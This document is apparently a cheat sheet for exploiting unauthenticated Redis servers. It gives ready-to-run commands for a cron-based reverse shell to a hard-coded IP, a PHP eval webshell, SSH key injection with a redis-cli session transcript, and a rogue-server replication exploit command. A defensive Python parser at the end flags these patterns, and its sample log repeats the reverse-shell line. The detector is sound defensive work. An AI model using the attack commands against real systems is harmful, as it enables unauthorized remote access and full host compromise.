Unauthorized access: the internal database can be reached without any authentication.
Reverse shell via a scheduled task (cron)
redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save
Obtaining a webshell
config set dir /var/www/html/ config set dbfilename shell.php set x "<?php @eval($_POST['test']);?>" save
Writing a public key for remote login
Preconditions: Redis running as root, unauthenticated access, SSH service enabled
1. Prepare your own public key in advance and write it to a local file foo.txt.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
2. Write that file into memory through redis
$ redis-cli -h 192.168.1.11 flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
3. Use redis-cli to write the configuration so that the public key lands in the .ssh directory
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
4. Log in with the key
ssh -i redis.pub root@192.168.192.133
Master-slave replication vulnerability:
Paper: https://paper.seebug.org/975/
Exploit:
GitHub: https://github.com/AdministratorGithub/redis-rogue-server
python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>
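A defender-side complement to the techniques above, added here as an example (it is not from this page or the redis-rogue-server project): a small parser for Redis MONITOR output that flags the command patterns every technique above depends on, namely CONFIG SET dir pointing into a cron, .ssh or web directory, a dbfilename without the .rdb suffix, a SAVE after both, and SLAVEOF/REPLICAOF to a master outside an allowlist. The MONITOR sample and the KNOWN_MASTERS allowlist are constructed for the example.

```python
import re
# Constructed sample of Redis MONITOR output (not captured from a real host):
# one client redirects an RDB dump into the cron spool, one is benign traffic,
# one points replication at an unknown master.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:51000] "set" "x" "\\n* * * * * bash -i >& /dev/tcp/10.0.0.9/4444 0>&1\\n"
1700000000.200000 [0 10.0.0.5:51000] "config" "set" "dir" "/var/spool/cron/"
1700000000.300000 [0 10.0.0.5:51000] "config" "set" "dbfilename" "root"
1700000000.400000 [0 10.0.0.5:51000] "save"
1700000001.000000 [0 10.0.0.7:52000] "get" "session:abc"
1700000002.000000 [0 10.0.0.5:51001] "slaveof" "203.0.113.10" "6379"
"""

# MONITOR line layout: <unix time> [<db> <client ip:port>] "CMD" "arg" ...
LINE_RE = re.compile(r'^(\S+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Directories an RDB dump should never be pointed at (the paths abused above).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/.ssh", "/var/www")
# Hypothetical allowlist of masters this instance is permitted to replicate from.
KNOWN_MASTERS = {"10.0.0.2"}


def parse_monitor_line(line):
    """Return (client, [command, args...]) or None for a malformed/empty line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _ts, _db, client, rest = m.groups()
    args = ARG_RE.findall(rest)
    return (client, args) if args else None


def detect_abuse(monitor_text):
    """Scan MONITOR output and return a list of (client, reason) alerts."""
    alerts, staged = [], {}  # staged: client -> CONFIG keys already redirected
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        client, (cmd, *rest) = parsed
        cmd = cmd.lower()
        if cmd == "config" and len(rest) >= 3 and rest[0].lower() == "set":
            key, val = rest[1].lower(), rest[2]
            if key == "dir" and any(d in val for d in SENSITIVE_DIRS):
                alerts.append((client, f"CONFIG SET dir -> {val}"))
                staged.setdefault(client, set()).add("dir")
            elif key == "dbfilename" and not val.endswith(".rdb"):
                alerts.append((client, f"CONFIG SET dbfilename -> {val}"))
                staged.setdefault(client, set()).add("dbfilename")
        elif cmd in ("save", "bgsave") and staged.get(client, set()) >= {"dir", "dbfilename"}:
            alerts.append((client, "SAVE after redirecting dir and dbfilename (file write)"))
        elif cmd in ("slaveof", "replicaof") and rest and rest[0].lower() != "no" and rest[0] not in KNOWN_MASTERS:
            alerts.append((client, f"{cmd.upper()} to unknown master {rest[0]}"))
    return alerts
```

The same rules apply to a redis-server log with a command filter in front of it; the point is that the payload itself is never matched, only the configuration changes that give it a place to land.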